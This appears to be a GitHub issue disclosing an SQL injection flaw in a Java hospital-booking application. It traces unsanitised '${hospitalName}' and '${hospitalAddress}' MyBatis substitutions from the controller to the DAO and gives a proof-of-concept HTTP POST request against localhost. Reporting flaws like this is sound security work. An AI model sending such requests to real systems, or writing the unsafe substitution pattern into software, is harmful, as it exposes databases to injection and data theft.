Skip to content

There is an SQL injection vulnerability in the application #111

@mukyuuhate

Description

@mukyuuhate

Sink

Under function cn.sfturing.dao.HospitalDao#findOrderHosNum. findOrderHosNum has unverified risk points '%${hospitalAddress}%' and '%${hospitalName}%'
Image

Taint Propagation

From source
cn.sfturing.web.HospitalController#orderHos

Image

cn.sfturing.service.impl.HospitalServiceImpl#findOrderHosNum

Image

cn.sfturing.dao.HospitalDao#findOrderHosNum

Image

POC

POST /ssm_pro/orderHos/1 HTTP/1.1
Host: localhost:8080
Content-Length: 124
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/ssm_pro/orderHos/1
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=912B489B920BBFBAD871BF2AA9FB25D7; JSESSIONID=713d8d23-ccbb-40ce-a034-d755e464e472; X-Litemall-Admin-Token=713d8d23-ccbb-40ce-a034-d755e464e472
Connection: keep-alive

province=&city=&district=&hospitalGrade=%E4%B8%89%E7%BA%A7%E7%94%B2%E7%AD%89&hospitalNature=%E9%BB%98%E8%AE%A4&hospitalName=
Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions